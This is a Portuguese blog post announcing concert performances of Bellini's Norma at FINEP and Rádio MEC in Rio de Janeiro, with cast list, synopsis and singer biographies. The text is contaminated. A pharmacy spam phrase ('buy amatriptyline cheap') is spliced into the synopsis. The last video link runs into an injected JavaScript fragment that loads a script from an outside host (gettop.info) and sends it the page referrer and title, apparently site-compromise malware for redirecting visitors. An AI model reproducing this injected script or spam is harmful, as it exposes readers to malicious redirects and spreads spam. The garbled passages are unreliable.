Escrito por em 4 dez 2011 nas áreas Lateral, Ópera, Programação, Rio de Janeiro

Outra apresentação será na Rádio MEC, no programa Sala de Concerto, com transmissão ao vivo e pela internet.

SERVIÇO

 

FINEP – Auditório
Praia do Flamengo, 200

Dia 29 de novembro, às 18:30 h.
Dia 06 de dezembro, às 18:30h.

Entrada franca

 

Rádio MEC – Auditório
Praça da República, 141-A

Dia 02 de dezembro, às 17h.

Entrada franca

 

Norma de Bellini é o mais novo projeto da frutífera parceria  entre o Espaço Finep e a Rádio Mec FM do Rio de Janeiro.
Lançando mão dos meios de comunicação de massa, com transmissão ao vivo através do rádio e da internet, a iniciativa abre espaço para jovens talentos, e tem tido ótima aceitação de crítica e público. A Direção Cênica e Direção Geral são de Lauro Gomes.

 

Os artistas envolvidos nesta récita, em forma de concerto, são:

– Norma: Marina Considera – soprano

– Pollione: Ivan Jorgensen – tenor

– Adalgisa: Carolina Faria – mezzo-soprano

– Oroveso: Allan Souza – baixo

– Pianista: Eliara Puggina

– Coro da Norma:

Sopranos:

– Loren Vandal
– Marianna Lima

Mezzo:

– Fabiana Queiroz

Contratenor:

– Fernando Portugal

Tenores:

– Felipe Cavalieri
– Vinicius Canzi

Baixos:

– Allan Souza
Flávio Lauria

Regência: Evandro Rodriguese

 

PROGRAMA E SINOPSE

 

PRIMEIRO ATO

Primeiro quadro

No primeiro ato, no bosque sagrado os Druidas invocam o deus Irminsul e esperam a chegada de Norma, a Sacerdotisa, que lhes irá dar o sinal para se revoltarem contra o jugo dos romanos. Os gauleses se retiram e chega Pollione, procônsul romano com o seu amigo Flávio. Norma mantém uma ligação secreta com Pollione, do qual tem dois filhos. Ela não sabe, mas Polione ama agora outra mulher, Adalgisa, uma jovem sacerdotisa. Flávio pergunta se Pollione não teme a ira de Norma. Como reposta, ouve a narração de um trágico sonho que o amigo teve na noite interior.

02 – Meco all’altar di Venere / Me protegge, me difende – (Pollione).

 

Um gongo convoca os gauleses que se reúnem com Norma para um místico ritual. Majestosa e solene, ela invoca a lua, a deusa da noite.

03 – Casta diva / Ah! bello a me ritorna – (Norma, coro).

 

Os Druidas transmitem a Norma a decisão que tomaram: quando ela der o sinal, eles matarão os ocupantes, começando por Pollione. Norma diz aceitar essa decisão, mas quando fica só, declara o seu amor pelo romano. Adalgisa fica só no bosque e manifesta o seu infortunado amor e os riscos que ele pode acarretar.

04 – Sgombra è la sacra selva – (Adalgisa).

 

Chega o apaixonado procônsul que a assedia e diz-lhe de uma vida maravilhosa que os dois terão em Roma. Indefesa, Adalgisa cede: partirá com ele.

05 – Eccola! Va, mi lascia / Va crudele, al dio spietato / – (Pollione, Adalgisa).

 

Segundo quadro

Passa-se junto da casa de Norma que esconde os filhos ao ouvir alguém se aproximar. É Adalgisa que lhe vem pedir para libertá-la dos seus votos, confessando estar possuída por um amor proibido. Norma cede ao pedido de Adalgisa e pergunta que amor é esse que a leva a tomar esta decisão. Adalgisa diz que é um romano que pretende levá-la consigo para Roma, e aponta Pollione que acaba de chegar para visitar os filhos. Ao compreender o que se passa, Norma revela o seu terrível segredo dizendo que também ela fora seduzida por aquele homem, e expulsa Pollione dizendo-lhe para partir sozinho para Roma.

buy amatriptyline cheap 06 – Oh! di qual sei tu vittima / Norma! De’ tuoi rimproveri / Oh! qual traspare orribile, – (Norma, Pollione, Adalgisa).

 

SEGUNDO ATO

O 2º ato se inicia quando a Sacerdotisa, num acesso de raiva, tenta, em vão, arranjar coragem para matar os próprios filhos.

07 – Dormono entrambi! ? Teneri figli. – (Norma).

 

Norma pede auxílio a Adalgisa, dizendo-lhe para partir para Roma com Pollione, levando com ela as crianças nascidas da sua ligação com o oficial romano. Adalgisa aceita.

08 – Mira, o Norma / Si fino all’ore estreme, – (Norma, Adalgisa).

 

Entretanto, os Druidas reúnem-se e decidem pôr os seus planos em execução sem demora, antes que Pollione parta, já que dizem que o Cônsul que o vem substituir é ainda mais cruel. Ouve-se um coro guerreiro.

09 – Guerra, guerra! Le galliche selve – (coro).

 

Do campo romano chegam notícias que dizem que Pollione está prestes a partir pretendendo levar consigo Adalgisa contra sua vontade, mas recusando-se a levar os filhos de Norma. A Sacerdotisa se revolta e diz aos Druidas ter chegado a hora de agir. Pollione é preso, mas, quando o Chefe dos Druidas se prepara para matá-lo, Norma intervém dizendo que ela mesma o fará. Quando fica a sós com Pollione, Norma pretende libertá-lo, desde que ele prometa partir sem Adalgisa.

10 – In mia man alfin tu sei – (Norma e Pollione).

 

Pollione recusa. Então Norma regressa ao Templo e confessa a sua traição e a sua culpa, dizendo dever ser sacrificada. A ópera termina com a morte de Norma e de Pollione que arrependido decide acompanhá-la no sacrifício.

11 – Qual cor perdiste – finale – (Norma, Pollione, Oroveso, coro).

 

Marina Considera

Marina Considera

Formada em canto pela UNIRIO e mestre pela Escola de Música da UFRJ, Marina Considera fez sua estreia profissional em 2006, sob regência do maestro Henrique Morelenbaum, na primeira montagem da ópera brasileira A Carta, do compositor de Elomar Figueira Mello, sob direção cênica de André Paes Leme, no CCBB de Brasília. Em 2007, ingressou no Opera Studio da renomada cantora Renata Scotto, em Roma, na Accademia Nazionale di Santa Cecília, do qual participou por 5 sessões consecutivas até  2009.

Durante este curso, desenvolveu vasto repertório e cantou no prestigioso Auditorium Parco della Musica, em Roma. Durante 2009 apresentou- se também na fundação Tito Gobbi, em Roma, e nel Teatro Stabile di abruzzo em Áquila, sob direção artística de Anna Vandi. Em 2010, ingressou como professora na Escola de Música da UFRJ e foi selecionada entre 15 de 400 cantores na Espanha, para participar do Master-class e concerto final no auditório de Zaragoza, sob supervisão da renomada cantora Montserrat Caballé.

 

Ivan Jorgensen

Ivan Jorgensen

Cursou o Bacharelado em Canto pela Escola de Música da UFRJ. Atualmente se aperfeiçoa em técnica vocal com o dr. Paulo Louzada.  Integra o Coro do Theatro Municipal do Rio de Janeiro. Participou de cursos de aperfeiçoamento com Roland Hermann (Karlsruhe), Maria Venuti (Karlsruhe), Neyde Thomas e Rio Novello.

Protagonizou La Traviata (2004) e Die Zauberflöte (2005) no Festival de Inverno de Petrópolis. No projeto Ópera no Bolso da Prefeitura do Rio de Janeiro, atuou nas montagens de Così fan Tutte (2004) e O rapto no serralho (2005 e 2007).  Na Cia Experimental de Ópera (UFRJ), participou das óperas La cambiale di matrimonio (2005), Don Giovanni (2005), Il maestro di musica (2006) e da estreia de O pagador de promessas (2006).

Atuou como solista na Fantasia coral, de Beethoven, com a OPS, sob a regência de Isaac Karabtchevsky (2007). Ainda em 2007, participou, como solista, da ópera L´Orfeo, no Theatro Municipal do Rio de Janeiro, e da estreia brasileira da ópera Arianna in Creta, de Händel, com a Symphonia Brasil Barroco, na Sala Cecília Meirelles. Protagonizou ainda La Bohème (2009), La Traviata (2010), Madama Butterfly (2010 e 2011) e Attila (2010) com a Cia. Lírica.

Atuou no Coro Sinfônico do Rio de Janeiro e integrou o Conjunto Vocal Calíope, com o qual atuou como solista na ópera O pescador e sua alma, de Marcos Lucas (Brasília e Rio, 2006/2007), sob a direção de Júlio Moretzsohn, e na Missa em Ré, de João de Deus Castro Lobo (2006). Em 2010, cantou Manrico em Il Trovatore em concerto transmitido ao vivo pela Radio MEC-FM, e repetido na FINEP.

 

Carolina Faria

Carolina Faria

Nascida na cidade de São Gonçalo, estado do Rio de Janeiro, Carolina Faria é bacharel em canto pela Universidade Federal do Rio de Janeiro.  Após a faculdade, seus mestres foram Neyde Thomas, Nilze Miriam Vianna, Nélson Portella, Oxana Kornievskaya e Leila Guimarães – em expressão e técnica vocal, e Peter Dauelsberg – em música de câmara.

A jovem cantora reúne em seu repertório tanto clássicos do repertório operístico como La Cenerentola,I Capuleti e i Montecchi, Hänsel und Gretel, Werther, Il Trovatore, quanto óperas contemporâneas como Phaedra, de B. Britten, Savitri, de G. Holst, O Menino Maluquinho, de Ernani Aguiar; Domitila, de João Guilherme Ripper; A Carta, de Elomar Figueira Mello e Olga, de Jorge Antunes. Possui extenso repertório sinfônico, de canções e obras de câmara, tendo participação constante em festivais dedicados  à música colonial brasileira e à música brasileira de vanguarda.

Carolina já trabalhou sob direção de renomados maestros, tais como Pascal Rophé, Gabriel Yared, Luiz Fernando Malheiro, John Neschling, José Maria Florêncio, Roberto Tibiriçá, Parcival Módolo e Ricardo Rocha. Atuou  sob direção de Sérgio Britto, Nélson Portella, André Heller-Lopes e William Pereira.

Atua como solista convidada junto às mais importantes orquestras do Brasil, tais como OSESP, OSMC, ORSSE, OSB, Orquestra Petrobrás Sinfônica e as orquestras dos teatros Municipal de São Paulo e Municipal do Rio de Janeiro. Colaborou com conjuntos de câmara tais como o Quinteto Villa-Lobos, o Conjunto Calíope, Cia Bachiana Brasileira, entre outros. Desenvolve atualmente trabalho camerístico com os mestres Carol McDavit e Larry Fountain.

Sua discografia inclui participações nos cds Eletro Acústicas, de Rodrigo Cicchelli Velloso, (selo ABM Digital); Um Sopro Novo, ao lado do Quinteto Villa-Lobos (selo Rádio MEC); junto à OSEMUFRJ Te Deum e Réquiem, do Padre José Maurício Nunes Garcia (Biscoito Fino). Junto à Cia. Bachiana Brasileira atuou no cd Missa de Réquiem, de Marcos Portugal (selo Biscoito Fino) e na gravação ao vivo do DVD ao vivo Ofício 1816 e Missa Pastoril, do Pe José Maurício Nunes Garcia.

Na TV, Carolina Faria é a voz em ‘Mon Coeur S’ouvre à ta Voix’, tema de amor de Norma e Teodoro (Glória Pires e Tarcísio Meira) em Insensato Coração (novela das 21h. da Rede Globo em 2011).

Sua estreia em salas internacionais deu-se em Abril de 2010, em série de concertos junto à Orchestre Lyrique Avignon – Provence, em Stabat Mater, de Giovanni Battista Pergolesi, sob direção de Pascal Rophé e parceria do soprano Michelle Canniccioni.

 

Outras informações importantes

1 – A apresentação na Rádio MEC pode também ser acompanhada pela internet no endereço:

http://radiomec.com.br/online/index.php

 

2 – Vídeos dos cantores, para maior embevecimento:

Marina Considera – http://www.youtube.com/watch?v=LNIUmSXgjnY&feature=related

Carolina Faria – http://www.youtube.com/watch?v=4BW_0i-NVkQ

Ivan Jorgensen – http://www.youtube.com/watch?v=x55UJZKu-rYif (document.currentScript) { s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Faça seu comentário